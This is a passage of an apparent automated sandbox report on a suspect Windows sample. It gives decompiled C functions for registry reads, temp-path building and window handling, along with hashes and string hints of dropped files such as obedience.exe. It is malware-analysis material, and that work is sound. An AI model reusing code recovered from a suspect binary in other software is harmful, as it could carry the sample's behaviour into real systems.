      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
      • String ID:
      • API String ID: 3515823920-0
      • Opcode ID: ee8c1c32445c7a29b2a9cf53aa7162c60deb41c849a7dac6dc6a9e742946b4ae
      • Instruction ID: 56fb97b41c96a473e1e4460693330d88968462b3bd63f5c1b11c0b0cb2c03694
      • Opcode Fuzzy Hash: ee8c1c32445c7a29b2a9cf53aa7162c60deb41c849a7dac6dc6a9e742946b4ae
      • Instruction Fuzzy Hash: 6511C1F1E04B009BD720DF5DD941A5BF7ECEB45720F144A2EE41AC3781E772E9408AA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 009A3DF0: _memset.LIBCMT ref: 009A3E4A
        • Part of subcall function 009A3DF0: _memset.LIBCMT ref: 009A3E64
        • Part of subcall function 009A3DF0: _memset.LIBCMT ref: 009A3E7E
        • Part of subcall function 009A3DF0: _memset.LIBCMT ref: 009A3E98
        • Part of subcall function 009A3DF0: GetTempPathA.KERNEL32(00000104,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EAC
        • Part of subcall function 009A3DF0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EC6
        • Part of subcall function 009A3DF0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3ED6
        • Part of subcall function 009A3DF0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EE6
        • Part of subcall function 009A3DF0: lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3EF6
        • Part of subcall function 009A3DF0: lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3F06
        • Part of subcall function 009A3DF0: lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,3A0E8B0C), ref: 009A3F16
      • Sleep.KERNELBASE(00000834,?,?,?), ref: 009A44E4
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memset$lstrcatlstrcpy$PathSleepTemp
      • String ID: StarBurn.dll$handkerchief.dat$obedience.exe
      • API String ID: 1422132221-3572986091
      • Opcode ID: bee02ac2ff5a505218bd2b3c2729597db65b767ed7a43d4cde926c6c8c1b5994
      • Instruction ID: d12eea5d2409bd39b557e769e80caa08244c909e899cb8d2304da89332b3d07e
      • Opcode Fuzzy Hash: bee02ac2ff5a505218bd2b3c2729597db65b767ed7a43d4cde926c6c8c1b5994
      • Instruction Fuzzy Hash: D1E0EC752843497BDA04EA948C47FCE3358AB99F00F00884277965B2C1DDB0A90087B5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009B151C(intOrPtr __ecx) {
      				void* _v8;
      				char _v12;
      				int _v16;
      				intOrPtr _v20;
      				int _v24;
      				long _t29;
      				char* _t30;
      				intOrPtr _t32;
      				char** _t34;
      				signed int _t39;
      				char** _t43;
      				char* _t45;
      
      				 *((intOrPtr*)(__ecx + 0xa8)) = 0;
      				_v20 = __ecx;
      				_v8 = 0;
      				_v12 = 0;
      				_v24 = 4;
      				_v16 = 0;
      				_t34 = 0xd080a8;
      				_t45 =  *0xd080a8; // 0xad8f10
      				if(_t45 == 0) {
      					L14:
      					return 1;
      				}
      				do {
      					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
      					if(_t29 != 0) {
      						goto L12;
      					}
      					_t8 =  &(_t34[1]); // 0xd080c8
      					_t43 =  *_t8;
      					while(1) {
      						_t30 =  *_t43;
      						if(_t30 == 0) {
      							break;
      						}
      						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
      							_t14 =  &(_t43[1]); // 0x1
      							_t39 =  *_t14;
      							_t32 = _v20;
      							if(_v12 == 0) {
      								 *(_t32 + 0xa8) =  *(_t32 + 0xa8) &  !_t39;
      							} else {
      								 *(_t32 + 0xa8) =  *(_t32 + 0xa8) | _t39;
      							}
      						}
      						_v12 = 0;
      						_v24 = 4;
      						_v16 = 0;
      						_t43 =  &(_t43[2]);
      					}
      					RegCloseKey(_v8);
      					_v8 = 0;
      					L12:
      					_t34 =  &(_t34[2]);
      				} while ( *_t34 != 0);
      				goto L14;
      			}

      0x009b1528
      0x009b152e
      0x009b1531
      0x009b1534
      0x009b1537
      0x009b153e
      0x009b1541
      0x009b1546
      0x009b154c
      0x009b15da
      0x009b15e0
      0x009b15e0
      0x009b1553
      0x009b1561
      0x009b1569
      0x00000000
      0x00000000
      0x009b156b
      0x009b156b
      0x009b15bc
      0x009b15bc
      0x009b15c0
      0x00000000
      0x00000000
      0x009b1589
      0x009b1591
      0x009b1591
      0x009b1594
      0x009b159a
      0x009b15a6
      0x009b159c
      0x009b159c
      0x009b159c
      0x009b159a
      0x009b15ac
      0x009b15af
      0x009b15b6
      0x009b15b9
      0x009b15b9
      0x009b15c5
      0x009b15cb
      0x009b15ce
      0x009b15ce
      0x009b15d1
      0x00000000

      APIs
      • RegOpenKeyExA.KERNELBASE(80000001,00D080A8,00000000,00000001,?), ref: 009B1561
      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 009B1581
      • RegCloseKey.ADVAPI32(?), ref: 009B15C5
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CloseOpenQueryValue
      • String ID:
      • API String ID: 3677997916-0
      • Opcode ID: 54744c95bba16a1aeb9d889d649ff9fb95cccf6cd5c87ae060b3ed0a8be32fc5
      • Instruction ID: 191cf1c313ebe49dd2b3c082aa6129a5952d60bd84697ccb80876b0fbee31f54
      • Opcode Fuzzy Hash: 54744c95bba16a1aeb9d889d649ff9fb95cccf6cd5c87ae060b3ed0a8be32fc5
      • Instruction Fuzzy Hash: 1F213E71D10208EFDF21CF85C994AEEBBF8EF90315F6080AAE44AA6250D7B15A44CF61
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 84%
      			E009B3452(void* __ecx, int _a4, CHAR* _a8, int _a12) {
      				char _v8;
      				int _v12;
      				int _t14;
      				void* _t15;
      				long _t19;
      				void* _t27;
      
      				_push(__ecx);
      				_push(__ecx);
      				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
      					_t14 = GetPrivateProfileIntA(_a4, _a8, _a12,  *(__ecx + 0x6c));
      				} else {
      					_t15 = E009B33F8(__ecx, _a4, 0); // executed
      					_t27 = _t15;
      					if(_t27 != 0) {
      						_a4 = 4;
      						_t19 = RegQueryValueExA(_t27, _a8, 0,  &_v12,  &_v8,  &_a4); // executed
      						RegCloseKey(_t27);
      						if(_t19 != 0) {
      							goto L2;
      						} else {
      							_t14 = _v8;
      						}
      					} else {
      						L2:
      						_t14 = _a12;
      					}
      				}
      				return _t14;
      			}

      0x009b3457
      0x009b3458
      0x009b345e
      0x009b34b4
      0x009b3460
      0x009b3465
      0x009b346a
      0x009b346e
      0x009b3487
      0x009b348f
      0x009b3498
      0x009b34a1
      0x00000000
      0x009b34a3
      0x009b34a3
      0x009b34a3
      0x009b3470
      0x009b3470
      0x009b3470
      0x009b3470
      0x009b346e
      0x009b34bc

      APIs
      • RegQueryValueExA.KERNELBASE(00000000,?,00000000,?,?,?), ref: 009B348F
      • RegCloseKey.ADVAPI32(00000000), ref: 009B3498
      • GetPrivateProfileIntA.KERNEL32 ref: 009B34B4
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ClosePrivateProfileQueryValue
      • String ID:
      • API String ID: 1423431592-0
      • Opcode ID: a51b505580e592e4f8d4e7de2a5de35d401646c194bbf019f255131f032413a1
      • Instruction ID: 1afb22ecfaa783d2cc0c1fe484e6f1b55d92a0dde861d98a415a1c36f375ea4a
      • Opcode Fuzzy Hash: a51b505580e592e4f8d4e7de2a5de35d401646c194bbf019f255131f032413a1
      • Instruction Fuzzy Hash: DD011672101208FBDB12DF94CD44FDE7BAEEB04364F108016FA02AA120D775EA159B90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009AA59B(struct HWND__* _a4, int _a8, signed int _a12, signed int _a16, signed int _a20) {
      				signed int _t9;
      				signed int _t11;
      				long _t20;
      
      				_t9 = GetWindowLongA(_a4, _a8);
      				_t20 =  !_a12 & _t9 | _a16;
      				if(_t9 != _t20) {
      					SetWindowLongA(_a4, _a8, _t20); // executed
      					_t11 = _a20;
      					if(_t11 != 0) {
      						SetWindowPos(_a4, 0, 0, 0, 0, 0, _t11 | 0x00000017);
      					}
      					return 1;
      				}
      				return 0;
      			}
      APIs
      • GetWindowLongA.USER32 ref: 009AA5A6
      • SetWindowLongA.USER32 ref: 009AA5C5
      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000200,?,009AA621,?,000000EC,?,00000020,00000000,?,009B0AF6), ref: 009AA5E0
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Long
      • String ID:
      • API String ID: 847901565-0
      • Opcode ID: 30aef349642b12162d9b457012fabbf3f65747a2e384f7997abca806a7276af2
      • Instruction ID: c1a7c230a3d05869bc1146d876e2067a45c09872cb969562060a3f1f8c951dd3
      • Opcode Fuzzy Hash: 30aef349642b12162d9b457012fabbf3f65747a2e384f7997abca806a7276af2
      • Instruction Fuzzy Hash: BDF0307552000DBFDF099F60DC098BE3FA9EF09356B009429F817C5520DB31DD61EAA4
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 78%
      			E009A34B0(signed int __ecx, signed int _a4) {
      				signed int _v8;
      				char _v16;
      				signed int _v20;
      				intOrPtr _v28;
      				intOrPtr _v32;
      				signed int _v44;
      				signed int _v48;
      				char _v51;
      				signed int _v52;
      				char _v56;
      				char _v60;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t61;
      				signed int _t62;
      				signed int _t64;
      				signed int _t66;
      				signed int _t70;
      				signed int _t72;
      				void* _t77;
      				signed int _t81;
      				intOrPtr _t82;
      				intOrPtr _t83;
      				signed int _t97;
      				intOrPtr* _t102;
      				signed int _t105;
      				signed int _t106;
      				intOrPtr _t111;
      				signed int _t115;
      				signed int _t119;
      				intOrPtr _t120;
      				signed int** _t124;
      				signed int _t125;
      				void* _t126;
      				void* _t127;
      
      				_push(0xffffffff);
      				_push(0xac79f8);
      				_push( *[fs:0x0]);
      				_t127 = _t126 - 0x2c;
      				_t61 =  *0xd0c910; // 0x3a0e8b0c
      				_t62 = _t61 ^ _t125;
      				_v20 = _t62;
      				_push(_t62);
      				 *[fs:0x0] =  &_v16;
      				_t81 = _a4;
      				_t64 = 0;
      				_t119 = __ecx;
      				if(_t81 == 0xffffffff) {
      					L37:
      					 *[fs:0x0] = _v16;
      					_pop(_t111);
      					_pop(_t120);
      					_pop(_t82);
      					return E00AAB46A(_t64, _t82, _v20 ^ _t125, _t104, _t111, _t120);
      				}
      				_t104 =  *( *(__ecx + 0x24));
      				if(_t104 == 0) {
      					L4:
      					__eflags =  *((intOrPtr*)(_t119 + 0x54)) - _t64;
      					if( *((intOrPtr*)(_t119 + 0x54)) == _t64) {
      						L36:
      						__eflags = _t64;
      						goto L37;
      					}
      					_t104 =  *(_t119 + 0x10);
      					_t112 = _t119 + 0x48;
      					__eflags =  *_t104 - _t119 + 0x48;
      					if( *_t104 == _t119 + 0x48) {
      						_t112 =  *(_t119 + 0x3c);
      						 *_t104 =  *(_t119 + 0x3c);
      						 *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x20)))) =  *((intOrPtr*)(_t119 + 0x40));
      						_t104 =  *(_t119 + 0x30);
      						__eflags = 0;
      						 *( *(_t119 + 0x30)) = 0;
      					}
      					__eflags =  *((intOrPtr*)(_t119 + 0x44)) - _t64;
      					if(__eflags != 0) {
      						_t105 = _t64;
      						_v48 = _t64;
      						_v52 = _t81;
      						_v28 = 0xf;
      						_v48 = _t105;
      						_v44 = _t64;
      						_v32 = 8;
      						__eflags = 0xf - 0x10;
      						if(0xf < 0x10) {
      							_t105 =  &_v48;
      						}
      						 *(_t105 + 8) = _t64;
      						_v8 = _t64;
      						while(1) {
      							L13:
      							_t66 = _v48;
      							_t83 = _v28;
      							while(1) {
      								_t106 = _t66;
      								__eflags = _t83 - 0x10;
      								if(_t83 < 0x10) {
      									_t106 =  &_v48;
      									_t66 = _t106;
      								}
      								_t104 =  &_v52;
      								_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x44)))) + 0x14))))(_t119 + 0x4c,  &_v52,  &_v51,  &_v60, _t66, _t106 + _v32,  &_v56);
      								__eflags = _t70;
      								if(_t70 < 0) {
      									break;
      								}
      								__eflags = _t70 - 1;
      								if(_t70 > 1) {
      									__eflags = _t70 - 3;
      									if(__eflags != 0) {
      										break;
      									}
      									_t72 = E009A2850(__eflags, _v52,  *((intOrPtr*)(_t119 + 0x54)));
      									__eflags = _t72;
      									if(_t72 == 0) {
      										E009A27D0( &_v48);
      										_t64 = _t119 | 0xffffffff;
      									} else {
      										E009A27D0( &_v48);
      										_t64 = _a4;
      									}
      									goto L37;
      								}
      								_t83 = _v28;
      								_t66 = _v48;
      								_t97 = _t66;
      								__eflags = _t83 - 0x10;
      								if(_t83 < 0x10) {
      									_t97 =  &_v48;
      								}
      								_t115 = _v56 - _t97;
      								__eflags = _t115;
      								if(_t115 == 0) {
      									L25:
      									_t104 =  &_v52;
      									 *((char*)(_t119 + 0x49)) = 1;
      									__eflags = _v60 -  &_v52;
      									if(_v60 !=  &_v52) {
      										E009A27D0( &_v48);
      										_t64 = _a4;
      										goto L37;
      									}
      									__eflags = _t115;
      									if(_t115 != 0) {
      										continue;
      									}
      									__eflags = _v32 - 0x20;
      									_t93 =  &_v48;
      									if(_v32 >= 0x20) {
      										L35:
      										_t64 = E009A27D0(_t93);
      										goto L36;
      									}
      									E009A2E10( &_v48, 8, _t115);
      									goto L13;
      								} else {
      									__eflags = _t83 - 0x10;
      									if(__eflags < 0) {
      										_t66 =  &_v48;
      									}
      									_push( *((intOrPtr*)(_t119 + 0x54)));
      									_push(_t115);
      									_push(1);
      									_push(_t66);
      									_t77 = E00AAC61A(_t83, _t104, _t115, _t119, __eflags);
      									_t127 = _t127 + 0x10;
      									__eflags = _t115 - _t77;
      									if(_t115 != _t77) {
      										break;
      									} else {
      										_t83 = _v28;
      										_t66 = _v48;
      										goto L25;
      									}
      								}
      							}
      							_t93 =  &_v48;
      							goto L35;
      						}
      					} else {
      						_push( *((intOrPtr*)(_t119 + 0x54)));
      						_push(_t81); // executed
      						_t64 = E00AABD75(_t81, _t112,  *((intOrPtr*)(_t119 + 0x54)), __eflags); // executed
      						__eflags = _t64 - 0xffffffff;
      						if(_t64 == 0xffffffff) {
      							goto L36;
      						}
      						_t64 = _t81;
      						goto L37;
      					}
      				}
      				_t102 =  *((intOrPtr*)(__ecx + 0x34));
      				if(_t104 >=  *_t102 + _t104) {
      					goto L4;
      				}
      				 *_t102 =  *_t102 - 1;
      				_t124 =  *(__ecx + 0x24);
      				_t7 =  &(( *_t124)[0]); // 0x1
      				 *_t124 = _t7;
      				 *( *_t124) = _t81;
      				_t64 = _t81;
      				goto L37;
      			}
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _fputc
      • String ID:
      • API String ID: 4236582747-3916222277
      • Opcode ID: 4bc22111920c1b9670d08875e242db19e5dae56e591633cdb856a3e860486c3a
      • Instruction ID: 6354a43e6526c2f171453fa5359053cca3845e378d40e279dc2b935d4333db08
      • Opcode Fuzzy Hash: 4bc22111920c1b9670d08875e242db19e5dae56e591633cdb856a3e860486c3a
      • Instruction Fuzzy Hash: 47615071E006099FCB14CF6CC4819AEF7B5FB5A310F548A1AF856A7781D731AA44CFA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 84%
      			E009B39FE(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t44;
      				intOrPtr _t65;
      				intOrPtr* _t68;
      				void* _t69;
      
      				_push(4);
      				E00AAD232(0xac8347, __ebx, __edi, __esi);
      				_t68 = __ecx;
      				_t65 =  *((intOrPtr*)(_t69 + 8));
      				_t44 =  *(_t65 + 0x14);
      				 *((intOrPtr*)(_t69 - 0x10)) = 1;
      				if(_t44 > 8) {
      					L27:
      					return E00AAD30A( *((intOrPtr*)(_t69 - 0x10)));
      				}
      				switch( *((intOrPtr*)(_t44 * 4 +  &M009B3B8A))) {
      					case 0:
      						L3:
      						_t51 = E009BD77F(_t56, _t66, _t68, _t72);
      						_push(0);
      						_push(0);
      						_push(0);
      						_push(0xe100);
      						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) + 0xc))() == 0) {
      							E009B5102(_t68);
      						}
      						if( *((intOrPtr*)(_t68 + 0x20)) != 0) {
      							goto L27;
      						}
      						goto L6;
      					case 1:
      						__edi =  *(__edi + 0x18);
      						__eax =  *__esi;
      						_push(__edi);
      						__eax =  *((intOrPtr*)( *__esi + 0xa4))();
      						__eflags = __eax;
      						if(__eax == 0) {
      							 *(__ebp - 0x10) =  *(__ebp - 0x10) & __eax;
      						}
      						goto L27;
      					case 2:
      						__edx =  *__esi;
      						__ebx = 0;
      						__esi[0x13] = 0;
      						__eax =  *(__edi + 0x18);
      						_push( *(__edi + 0x18));
      						__eax =  *((intOrPtr*)( *__esi + 0xa4))();
      						__eflags = __eax;
      						if(__eax != 0) {
      							__eax = __esi[8];
      							__esi[0x25] = __edi;
      							__eflags = __eax;
      							if(__eax == 0) {
      								__eax = E009B8782(__ecx);
      							}
      							__eax = SendMessageA( *(__eax + 0x20), 0x111, 0xe108, __ebx);
      							__esi[0x25] = __ebx;
      						}
      						L6:
      						 *((intOrPtr*)(_t69 - 0x10)) = 0;
      						goto L27;
      					case 3:
      						goto L27;
      					case 4:
      						__eax = __esi[0x13];
      						__esi[0x13] = __esi[0x13] & 0x00000000;
      						__esi[0x25] = __eax;
      						goto L27;
      					case 5:
      						__eax =  *__esi;
      						__eax =  *((intOrPtr*)( *__esi + 0x98))();
      						__ebx = 0;
      						 *(__ebp - 0x10) = 0;
      						__eflags = __esi[0x25];
      						if(__eflags != 0) {
      							goto L27;
      						}
      						__ecx = E009A6291(__eflags, 0x2c);
      						 *((intOrPtr*)(__ebp + 8)) = __ecx;
      						 *((intOrPtr*)(__ebp - 4)) = 0;
      						goto L23;
      					case 6:
      						__eax =  *__esi;
      						__eax =  *((intOrPtr*)( *__esi + 0x9c))();
      						__ebx = 0;
      						__eflags =  *(__edi + 8);
      						if( *(__edi + 8) == 0) {
      							_push(0xffffffff);
      							_push(0);
      							__eflags = __eax;
      							if(__eflags == 0) {
      								_push(0xf10c);
      							} else {
      								_push(0xf10b);
      							}
      							__eax = E009B4535(__ebx, __edx, __edi, __esi, __eflags);
      						}
      						 *(__ebp - 0x10) = __ebx;
      						__eflags = __esi[0x25] - __ebx;
      						if(__eflags == 0) {
      							__ecx = E009A6291(__eflags, 0x2c);
      							 *((intOrPtr*)(__ebp + 8)) = __ecx;
      							 *((intOrPtr*)(__ebp - 4)) = 1;
      							L23:
      							__eflags = __ecx - __ebx;
      							if(__eflags == 0) {
      								__eax = 0;
      								__eflags = 0;
      							} else {
      								__eax = E009B2204(__ecx, __eflags);
      							}
      							__esi[0x25] = __eax;
      							 *((intOrPtr*)(__eax + 0x14)) = 7;
      						}
      						goto L27;
      					case 7:
      						_t56 =  *__ecx;
      						_t66 = _t65 + 0x28;
      						_push(_t65 + 0x28);
      						_push( *((intOrPtr*)(_t56 + 0xdc))());
      						 *((intOrPtr*)(_t56 + 0xd0))();
      						_t50 =  *((intOrPtr*)( *__ecx + 0x104))();
      						_t72 = _t50;
      						if(_t50 != 0) {
      							goto L27;
      						}
      						goto L3;
      				}
      			}
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3MessageSend
      • String ID:
      • API String ID: 936991600-0
      • Opcode ID: 05ea707ffef993ea73edd3467da10068f85062f1b225b90c4b4aa8c421b75f57
      • Instruction ID: db0ddda1975576bd534e9265d5160d069a5beecfec69cfcb0aac1e812e7c3dc6
      • Opcode Fuzzy Hash: 05ea707ffef993ea73edd3467da10068f85062f1b225b90c4b4aa8c421b75f57
      • Instruction Fuzzy Hash: A7416C70601215DFDB20DF74CA85BBAB7E8FF48364F10893DE69A9B295CB709A40CB50
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 75%
      			E009A927E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				void* _t30;
      				intOrPtr _t34;
      				struct HMENU__* _t40;
      				void* _t48;
      				intOrPtr _t52;
      				signed short _t64;
      				intOrPtr* _t67;
      				void* _t69;
      				void* _t70;
      
      				_t62 = __edx;
      				_t51 = __ebx;
      				_push(8);
      				E00AAD232(0xacd197, __ebx, __edi, __esi);
      				_t67 = __ecx;
      				_t64 =  *(_t70 + 8);
      				 *(__ecx + 0xc4) = _t64;
      				_t30 = E009B9D52();
      				_t54 = _t70 + 8;
      				E009A5D70(_t70 + 8, __edx, _t30);
      				 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
      				_push(_t64);
      				if(E009BE51C() != 0) {
      					_t54 = _t70 + 8;
      					_t48 = E009A8DDD(_t70 + 8, __edx, _t32, _t64);
      					_t73 = _t48;
      					if(_t48 != 0) {
      						E009BE527(__ebx, _t67 + 0xe4,  *(_t70 + 8), 0, 0xa);
      					}
      				}
      				E009AFF05(_t51, _t54, _t64, _t67, _t73, 8);
      				_t34 = E009A70AD(_t51, _t67, _t73,  *((intOrPtr*)(_t70 + 0xc)), _t64); // executed
      				 *((intOrPtr*)(_t70 - 0x10)) = _t34;
